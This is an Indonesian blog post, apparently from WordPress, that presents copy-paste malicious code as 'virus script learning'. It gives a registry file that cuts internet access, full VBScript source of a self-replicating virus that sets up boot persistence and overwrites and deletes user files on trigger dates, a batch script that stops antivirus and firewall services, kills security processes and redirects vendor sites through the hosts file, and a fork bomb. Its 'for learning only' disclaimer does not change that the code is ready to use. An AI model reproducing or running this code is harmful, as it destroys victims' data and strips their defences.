Belajar script virus

Quote:

Siap2 brada xixiixi!! aaaaaaaaawww kita bedah 1 ini :
Code Registry Untuk Menghilangkan AKses Internet
Script ini digunakan untuk mendisable internet koneksi pada sebuah komputer. cara penggunaanya tinggal copy – paste saja di Notepad. ini hanya untuk pembelajaran saja dan tidak diperkenankan untuk merusak komputer:

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\3]
“1803”=dword:00000000
Lalu Simpan Dalam Format .reg untuk mengaktifkan atau mengenable internet lagi di
dalam komputer tersebut brada cukup menggunakan kode
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\3]
“1803”=dword:00000003
Dan Simpan Dalam Format .reg,Jangan Lpa DI Double klik ya
Souce Code Virus VBS.Pluta.A
Virus Ini Kalau Terdeteksi Oleh Kapesky Bernama Trojan.Win32.KillFiles.nx Kalau
ClamAv VBS.Pluta.A.
Dan Jika discan dengan Norman,NOD32 DAn AVG maka Tak Akan terdeteksi Virus,Padahal
Virus Ini Sangat Berbahaya.Cara Kerja Virus Ini Adalah Mengecek Tanggal Dan Bulan
Jika Bukan Tanggal Lahirq Atau Pacarq Maka Virus Ini Akan Mengcopy Ke %systemroot
%\system32\ Dan Merubah Registry di:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\ agar setiap
booting maka file virus ini akan aktif.Dan Jika Ini Adalah Ulang Tahunku Atau
Pacarq Maka Virus Ini AKan Menginfeksi Semua File Berjenis .jpg, .gif, .log, .ini,
.doc and .exe.
Code Virus Ada Dibawah
Code:
On Error Resume Next
dim
FSobj,winDir,sysDir,copySelf,newFile,rawFileData,hackedFileData,fixData,dataFixed,
newFileData,copySelfComplete
set FSobj=CreateObject(“Scripting.FileSystemObject”)
set sysDir=FSobj.GetSpecialFolder(1)
checkDate()
function checkDate()
if (day(Now)=16 and month(Now)=2)or(day(Now)=29 and month(Now)=3) then
beginInfestation()
displayMessage()
else
plantTrojanizedFile()
end if
end function
function plantTrojanizedFile()
set copySelf=FSobj.CreateTextFile(sysDir+”\sys-dlBD.vbs”)
copySelf.close
set newFile=FSobj.OpenTextFile(WScript.ScriptFullname,1)
writeCopy()
hackedFileData=replace(rawFileData,chr(42),chr(68))
fixData=replace(hackedFileData,chr(37),chr(76))
dataFixed=replace(fixData,chr(124),chr(46))
newFileData=replace(dataFixed,chr(94),””””)
set copySelfComplete=FSobj.OpenTextFile(sysDir+”\sys-dlBD.vbs”,2)
copySelfComplete.write newFileData
copySelfComplete.close
createRegKey
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\sysdlBD”,sysDir&
“\sys-dlBD.vbs”
end function
sub createRegKey(regKey,regVal)
dim regEdit
set regEdit=CreateObject(“WScript.Shell”)
regEdit.RegWrite regKey,regVal
end sub
sub beginInfestation
On Error Resume Next
dim drive,machine,complete
set machine=FSobj.Drives
for each drive in machine
if (drive.DriveType=2)or(drive.DriveType=3) then
indexFolders(drive.Path&””)
end If
next
beginInfestation=complete
end sub
sub indexFolders(location)
On Error Resume Next
dim specs, file, subFol
set specs=FSobj.GetFolder(location)
set subFol=specs.SubFolders
for each file in subFol
spreadData(file.Path)
indexFolders(file.Path)
next
end sub
sub spreadData(location)
On Error Resume Next
dim
folder,directory,file,generateCopy,appName,adExt,orgMes,mesStageTwo,mesStageThree,
finalMes,extName,complete
set folder=FSobj.GetFolder(location)
set directory=folder.Files
orgMes=”Happy BirthDay to me! Smile – You have been infected with the VBS/dlBD
Virus…Written by *|%|”
mesStageTwo=replace(orgMes,chr(42),chr(68))
mesStageThree=replace(mesStageTwo,chr(124),chr(46))
finalMes=replace(mesStageThree,chr(37),chr(76))
for each file in directory
extName=lcase(FSobj.GetExtensionName(file.Path))
complete=lcase(file.Name)
if (extName=”jpg”)or(extName=”gif”)then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&””&appName&”.txt”)
FSobj.DeleteFile (file.Path)
elseIf (extName=”log”)or(extName=”ini”) then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&””&appName&”.txt”)
FSobj.DeleteFile (file.Path)
elseIf (extName=”doc”)or(extName=”exe”) then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&””&appName&”.txt”)
FSobj.DeleteFile (file.Path)
end if
next
end sub
function displayMessage()
dim shell,messageFile
set shell = CreateObject(“WScript.Shell”)
set messageFile=FSobj.CreateTextFile(sysDir&”\dlBD-mes.bat”)
messageFile.close
set FSobj=CreateObject(“Scripting.FileSystemObject”)
set messageFile=FSobj.CreateTextFile(sysDir&”\dlBD-mes.bat”)
messageFile.WriteLine(“@title Happy Birthday to me! Smile – VBS/dlBD Virus”)
messageFile.WriteLine(“@cls”)
messageFile.WriteLine(“@echo Happy BirthDay to me! Smile – You have been infected
with the VBS/dlBD Virus Sad“)
messageFile.WriteLine(“@echo.”)
messageFile.WriteLine(“@pause”)
messageFile.close
shell.Run(sysDir&”\dlBD-mes.bat”)
end function
function writeCopy()
rawFileData=”rem – VBS/dlBD ^DL BirthDay^ Virus by *|%|” &vbcrlf& _
“On Error Resume Next” &vbcrlf& _
“dim FSobj,winDir,sysDir” &vbcrlf& _
“set FSobj=CreateObject(^Scripting|FileSystemObject^)” &vbcrlf& _
“set sysDir=FSobj|GetSpecialFolder(1)” &vbcrlf& _
“checkDate()” &vbcrlf& _
“function checkDate()” &vbcrlf& _
“if (day(Now)=31 and month(Now)=3)or(day(Now)=19 and month(Now)=12) then” &vbcrlf&
_
“beginInfestation()” &vbcrlf& _
“displayMessage()” &vbcrlf& _
“end if” &vbcrlf& _
“end function” &vbcrlf& _
“sub beginInfestation” &vbcrlf& _
“On Error Resume Next ” &vbcrlf& _
“dim drive,machine,complete” &vbcrlf& _
“set machine=FSobj|Drives ” &vbcrlf& _
“for each drive in machine ” &vbcrlf& _
“if (drive|DriveType=2)or(drive|DriveType=3) then” &vbcrlf& _
“indexFolders(drive|Path&^\^)” &vbcrlf& _
“end If” &vbcrlf& _
“next” &vbcrlf& _
“beginInfestation=complete” &vbcrlf& _
“end sub” &vbcrlf& _
“sub indexFolders(location)” &vbcrlf& _
“On Error Resume Next” &vbcrlf& _
“dim specs, file, subFol” &vbcrlf& _
“set specs=FSobj|GetFolder(location)” &vbcrlf& _
“set subFol=specs|SubFolders” &vbcrlf& _
“for each file in subFol” &vbcrlf& _
“spreadData(file|Path)” &vbcrlf& _
“indexFolders(file|Path)” &vbcrlf& _
“next” &vbcrlf& _
“end sub” &vbcrlf& _
“sub spreadData(location)” &vbcrlf& _
“On Error Resume Next” &vbcrlf& _
“dim
folder,directory,file,generateCopy,appName,adExt,orgMes,mesStageTwo,mesStageThree,
finalMes,extName,complete” &vbcrlf& _
“set folder=FSobj|GetFolder(location)” &vbcrlf& _
“set directory=folder|Files” &vbcrlf& _
“finalMes=^Happy BirthDay to me! Smile – You have been infected with the VBS/dlBD
Virus…Written by *|%|^” &vbcrlf& _
“for each file in directory” &vbcrlf& _
“extName=lcase(FSobj|GetExtensionName(file|Path))” &vbcrlf& _
“complete=lcase(file|Name)” &vbcrlf& _
“if (extName=^jpg^)or(extName=^gif^)then ” &vbcrlf& _
“set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)” &vbcrlf& _
“generateCopy|write finalMes ” &vbcrlf& _
“generateCopy|Close” &vbcrlf& _
“appName=FSobj|GetBaseName(file|Path)” &vbcrlf& _
“set adExt=FSobj|GetFile(file|Path)” &vbcrlf& _
“adExt|copy(location&^\^&appName&^|txt^)” &vbcrlf& _
“FSobj|DeleteFile (file|Path)” &vbcrlf& _
“elseIf (extName=^log^)or(extName=^ini^) then” &vbcrlf& _
“set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)” &vbcrlf& _
“generateCopy|write finalMes” &vbcrlf& _
“generateCopy|Close” &vbcrlf& _
“appName=FSobj|GetBaseName(file|Path)” &vbcrlf& _
“set adExt=FSobj|GetFile(file|Path)” &vbcrlf& _
“adExt|copy(location&^\^&appName&^|txt^)” &vbcrlf& _
“FSobj|DeleteFile (file|Path)” &vbcrlf& _
“elseIf (extName=^doc^)or(extName=^exe^) then” &vbcrlf& _
“set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)” &vbcrlf& _
“generateCopy|write finalMes” &vbcrlf& _
“generateCopy|Close” &vbcrlf& _
“appName=FSobj|GetBaseName(file|Path)” &vbcrlf& _
“set adExt=FSobj|GetFile(file|Path)” &vbcrlf& _
“adExt|copy(location&^\^&appName&^|txt^)” &vbcrlf& _
“FSobj|DeleteFile (file|Path)” &vbcrlf& _
“end if” &vbcrlf& _
“next” &vbcrlf& _
“end sub” &vbcrlf& _
“function displayMessage()” &vbcrlf& _
“dim shell,messageFile” &vbcrlf& _
“set shell = CreateObject(^WScript|Shell^)” &vbcrlf& _
“set messageFile=FSobj|CreateTextFile(sysDir&^\dlBD-mes|bat^)” &vbcrlf& _
“messageFile|close” &vbcrlf& _
“set FSobj=CreateObject(^Scripting|FileSystemObject^)” &vbcrlf& _
“set messageFile=FSobj|CreateTextFile(sysDir&^\dlBD-mes|bat^)” &vbcrlf& _
“messageFile|WriteLine(^@title Happy Birthday to me! Smile – VBS/dlBD Virus – by *|%|
^)” &vbcrlf& _
“messageFile|WriteLine(^@cls^)” &vbcrlf& _
“messageFile|WriteLine(^@echo Happy BirthDay to me! Smile – You have been infected
with the VBS/dlBD Virus Sad^)” &vbcrlf& _
“messageFile|WriteLine(^@echo|^)” &vbcrlf& _
“messageFile|WriteLine(^@pause^)” &vbcrlf& _
“messageFile|close” &vbcrlf& _
“shell|Run(sysDir&^\dlBD-mes|bat^)” &vbcrlf& _
“end function”
end function
Source Code Av Killer
Mungkin Code INi Blum Bisa Dibilang Virus Tapi Ini Bila DiGabung Dengan Kode Virus
Batch Lainnya Maka Akan Jadi Sangat Mengerikan,DIbawah Ini Adalah Kode AV Killer
Dalam Eksitensi Bat.Cara Kerjanya Adalah dengan membunuh Antivirus yang ada di
Komputer Lalu MemBlock Semua Website Security.CUkup Keren Menurut Saya.Kodenya Ada
DIbawah Ini :
set huku=net stop
%huku% “Security Center”
%huku% SharedAccess
netsh firewall set opmode mode=disable
%huku% AVP.EXE
%huku% CFINET32
%huku% CFINET
%huku% ICMON
%huku% SAFEWEB
%huku% WEBSCANX
%huku% ANTIVIR
%huku% MCAFEE
%huku% NORTON
%huku% NVC95
%huku% FP-WIN
%huku% IOMON98
%huku% PCCWIN98
%huku% F-PROT95
%huku% F-STOPW
%huku% PVIEW95
%huku% NAVWNT
%huku% NAVRUNR
%huku% NAVLU32
%huku% NAVAPSVC
%huku% NISUM
%huku% SYMPROXYSVC
%huku% RESCUE32
%huku% NISSERV
%huku% ATRACK
%huku% IAMAPP
%huku% LUCOMSERVER
%huku% LUALL
%huku% NMAIN
%huku% NAVW32
%huku% NAVAPW32
%huku% VSSTAT
%huku% VSHWIN32
%huku% AVSYNMGR
%huku% AVCONSOL
%huku% WEBTRAP
%huku% POP3TRAP
%huku% PCCMAIN
%huku% PCCIOMON
%huku% AHNLAB
%huku% KIMLAB
%huku% MONSYSNT
%huku% MONSVCNT
%huku% NAVAPW32
%huku% NAVAPSVC
%huku% NAVW32
%huku% NAVWNT
%huku% V3PRO32
%huku% V3
%huku% V3CFGU
%huku% V3P3AT
%huku% knlscan
%huku% scanner.exe
%huku% scanner
%huku% SpiderNT
%huku% SpiderUI
%huku% spider
%huku% Vcrmon
%huku% vcr32
%huku% kavsvc
%huku% kav.exe
%huku% KVAgent
%huku% KVDOS
%huku% KVSrvXP
%huku% KVwsc
%huku% kvwsc
%huku% RavMon
%huku% RavMonD.exe
%huku% RavMonD
%huku% RAV.exe
%huku% WATCHER
%huku% avgupsvc
%huku% avgamsvr
%huku% avgemc
%huku% avgupsvc
%huku% zlclient
%huku% AszMon.exe
%huku% AszTray.exe
%huku% AhnRpt
%huku% mssvc
%huku% ADSpider.exe
%huku% firedaemon.exe
%huku% servudaemon.exe
%huku% firedaemon
%huku% CCAPP.exe
%huku% servu.exe
%huku% McVSEscn.exe
%huku% mcagent.exe
%huku% fxsvc.exe
%huku% clisvc.exe
%huku% vrmonsvc.exe
%huku% dllhost.exe
%huku% RsRavMon
%huku% RsCCenter
%huku% Norton AntiVirus Server
%huku% Norton AntiVirus
%huku% Serv-U
%huku% Norton AntiVirus Auto Protect Service
%huku% Norton AntiVirus Client
%huku% Symantec AntiVirus Client
%huku% Norton AntiVirus Server
%huku% NAV Alert
%huku% Nav Auto-Protect
%huku% McShield
%huku% DefWatch
%huku% eventlog
%huku% WMDM PMSP Service
%huku% lmhosts
%huku% eventlog
%huku% InoRPC
%huku% InoRT
%huku% InoTask
%huku% IREIKE
%huku% IPSECMON
%huku% GhostStartService
%huku% SharedAccess
%huku% NAVAPSVC
%huku% NISUM
%huku% SymProxySvc
%huku% NISSERV
%huku% ntrtscan
%huku% tmlisten
%huku% PccPfw
%huku% tmproxy
%huku% Tmntsrv
%huku% PCCPF
%huku% AvSynMgr
%huku% McAfeeFramework
%huku% Micorsoft Network Firewall Service
%huku% avgServ
%huku% MonSvcNT
%huku% V3MonNT
%huku% V3MonSvc
%huku% spidernt
%huku% MCVSrte
%huku% SweepNet
%huku% SWEEPSRV.SYS
%huku% Aavgupsvc
%huku% KVAgent
%huku% KVDos.exe
%huku% KVSrvXP.exe
%huku% kvwsc.exe
%huku% DefWatch.exe
%huku% DWHWizrd.exe
%huku% LDVPREG.exe
%huku% LuaWrap.exe
%huku% Rtvscan.exe
%huku% SavRoam.exe
%huku% SymClnUp.exe
%huku% VPC32.exe
%huku% VPDN_LU.exe
%huku% VPTray.exe
%huku% viruscan
%huku% viruscan.inf
%huku% viruscan1.dat
%huku% viruscan2.dat
%huku% GhostStartTrayApp
%huku% GhReboot
%huku% ghstwalk
%huku% ghwrap
%huku% Ghost Boot Wizard
%huku% ghost
%huku% Ghostexp
%huku% GhostStart
%huku% GhostStartService
%huku% AVG RESIDENT SHIELD
%huku% “Turbo Vaccine Monitoring Service”
%huku% “MonSvcNT”
%huku% “rising process communication center”
%huku% “rising realtime monitor service”
%huku% “OfficeScanNT Monitor”
%huku% “RemoteAgent”
%huku% “Ahnlab Task Scheduler”
%huku% “Panda Antivirus”
%huku% “ZoneAlarm”
%huku% “Detector de OfficeScanNT”
%huku% “Symantec Proxy Service”
%huku% “Symantec Event Manager”
%huku% “Norton Internet Security Accounts Manager”
%huku% “Norton Internet Security Proxy Srvice”
%huku% “Norton Internet Security service”
%huku% “Norton AntiVirus Server”
%huku% “Norton AntiVirus Auto Protect Service”
%huku% “Norton AntiVirus Client”
%huku% “Norton AntiVirus Corporate Edition”
%huku% “ViRobot Professional Monitoring”
%huku% “PC-cillin Personal Firewall”
%huku% “Trend Micro Proxy Service”
%huku% “Trend NT Realtime Service”
%huku% “Trend Micro Real-time Service”
%huku% “Trend Micro Personal Firewall
%huku% “Trend Micro Central Control Component””
%huku% “McAfee.com McShield”
%huku% “McAfee.com VirusScan Online Realtime Engine”
%huku% “McAfee Agent”
%huku% ” McAfee SecurityCenter Update Manager ”
%huku% “McShield”
%huku% “SyGateService”
%huku% “Sygate Personal Firewall Pro”
%huku% “Sygate Personal Firewall”
%huku% “Sophos Anti-Virus”
%huku% “Sophos Anti-Virus Network”
%huku% “eTrust Antivirus Job Server”
%huku% “eTrust Antivirus Realtime Server”
%huku% “eTrust Antivirus RPC Server”
%huku% “ViRobot Expert Monitoring”
%huku% “ViRobot Lite Monitoring”
%huku% “Quick Heal Online Protection”
%huku% “V3MonNT”
%huku% “V3MonSvc”
%huku% “Security Center”
%huku% “Windows Firewall”
%huku% “Windows Internet Connection Sharing(ICS)”
%huku% “NAV Alert”
%huku% “NAV Auto-Protect”
%huku% “ScriptBlocking Service”
%huku% “DefWatch”
%huku% “Background Intelligent Transfer Service”
%huku% “System Event Notification”
%huku% “BlackICE”
%huku% “AVSync Manager”
%huku% “AVG7 Alert Manager Server”
%huku% “AVG7 Update Service”
%huku% “InVircible Scheduler”
%huku% “kavsvc”
%huku% “avast! Antivirus”
%huku% “avast! iAVS4 Control Service”
%huku% “Trend ServerProtect Agent”
%huku% “Trend ServerProtect ”
%huku% “AVG6 Service”
%huku% “AVG RESIDENT SHIELD”
%huku% “nod32kui”
%huku% nod32kui
%huku% “nod32krn”
%huku% nod32krn
%huku% “nod32krn.exe”
%huku% nod32krn.exe
%huku% “Turbo Vaccine Monitoring Service”
%huku% “MonSvcNT”
%huku% “rising process communication center”
%huku% “rising realtime monitor service”
%huku% “OfficeScanNT Monitor”
%huku% “RemoteAgent”
%huku% “Ahnlab Task Scheduler”
%huku% “Panda Antivirus”
%huku% “ZoneAlarm”
%huku% “Detector de OfficeScanNT”
%huku% “Symantec Proxy Service”
%huku% “Symantec Event Manager”
%huku% “Norton Internet Security Accounts Manager”
%huku% “Norton Internet Security Proxy Srvice”
%huku% “Norton Internet Security service”
%huku% “Norton AntiVirus Server”
%huku% “Norton AntiVirus Auto Protect Service”
%huku% “Norton AntiVirus Client”
%huku% “Norton AntiVirus Corporate Edition”
%huku% “ViRobot Professional Monitoring”
%huku% “PC-cillin Personal Firewall”
%huku% “Trend Micro Proxy Service”
%huku% “Trend NT Realtime Service”
%huku% “Trend Micro Real-time Service”
%huku% “Trend Micro Personal Firewall
%huku% “Trend Micro Central Control Component””
%huku% “McAfee.com McShield”
%huku% “McAfee.com VirusScan Online Realtime Engine”
%huku% “McAfee Agent”
%huku% ” McAfee SecurityCenter Update Manager ”
%huku% “McShield”
%huku% “SyGateService”
%huku% “Sygate Personal Firewall Pro”
%huku% “Sygate Personal Firewall”
%huku% “Sophos Anti-Virus”
%huku% “Sophos Anti-Virus Network”
%huku% “eTrust Antivirus Job Server”
%huku% “eTrust Antivirus Realtime Server”
%huku% “eTrust Antivirus RPC Server”
%huku% “ViRobot Expert Monitoring”
%huku% “ViRobot Lite Monitoring”
%huku% “Quick Heal Online Protection”
%huku% “V3MonNT”
%huku% “V3MonSvc”
%huku% “Security Center”
%huku% “Windows Firewall”
%huku% “Windows Internet Connection Sharing(ICS)”
%huku% “NAV Alert”
%huku% “NAV Auto-Protect”
%huku% “ScriptBlocking Service”
%huku% “DefWatch”
%huku% “Background Intelligent Transfer Service”
%huku% “System Event Notification”
%huku% “BlackICE”
%huku% “AVSync Manager”
%huku% “AVG7 Alert Manager Server”
%huku% “AVG7 Update Service”
%huku% “InVircible Scheduler”
%huku% “kavsvc”
%huku% “avast! Antivirus”
%huku% “avast! iAVS4 Control Service”
%huku% “Trend ServerProtect Agent”
%huku% “Trend ServerProtect ”
%huku% “AVG6 Service”
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
tskill alg.exe
if exist “C:\Programme\Avira\AntiVir PersonalEdition Classic” del /F /S /Q
“C:\Programme\Avira\AntiVir PersonalEdition Classic\*.*”
echo 127.0.0.1 www.symantec.com >%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 securityresponse.symantec.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 symantec.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.sophos.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 sophos.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.mcafee.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 mcafee.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 liveupdate.symantecliveupdate.com >>%windir
%\system32\drivers\etc\hosts
echo 127.0.0.1 www.viruslist.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 viruslist.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 f-secure.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.f-secure.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 kaspersky.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.avp.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.kaspersky.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 avp.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.networkassociates.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 networkassociates.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.ca.com ca.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 mast.mcafee.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 my-etrust.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.my-etrust.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 download.mcafee.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 dispatch.mcafee.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 secure.nai.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 nai.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.nai.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 update.symantec.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 updates.symantec.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 us.mcafee.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 liveupdate.symantec.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 customer.symantec.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 rads.mcafee.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 trendmicro.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.microsoft.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.trendmicro.com >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 metalhead2005.info >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 gfx-dose.de >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.gfx-dose.de >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 irc.blackcarder.net >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 d66.myleftnut.info >>%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 http://www.symantec.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.sophos.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.avast.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.mcafee.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.f-prot.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.f-secure.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.avp.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.kaspersky.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.bitdefender.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.my-etrust.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.eset.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.norman.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.grisoft.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.google.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.hotmail.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 mx1.hotmail.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 mx2.hotmail.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 messenger.hotmail.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.google.co.uk>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.youtube.com>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.youtube.co.uk>>c:\windows\system32\Drivers\Etc\Hosts
echo 127.0.0.1 http://www.yahoo.com>>c:\windows\system32\Drivers\Etc\Hosts
echo [HKLM\SYSTEM\ControlSet001\Services\wuauserv] >>C:\reg.reg
echo Start=dword:00000004 >>C:\reg.reg
echo [HKLM\SYSTEM\ControlSet001\Services\wscsvc] >>C:\reg.reg
echo Start=dword:00000004 >>C:\reg.reg
regedit /s C:\reg.reg

Source Code Virus Batch Paling Simpler
Ini Kode Virus Paling SImple Yang Saya Tahu Codenya Adah :
%0|%0
Ya Memang Hanya 5 Character,tapi silahkan save as di notepad dengan nama
namafile.bat.Dengan double klik maka komputer brada akan mengalami Crash dengan 500
lebih program akan terbuka.Simple dan Menghancurkaan.Sekali Fork Bom DIaktifkan
dalam komputer maka Tidak Ada Cara Lain Selain Merestart Komputer.Menghentikan
Fork Bom dengan Task Manager Adalah Hal Yang Mustahil

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s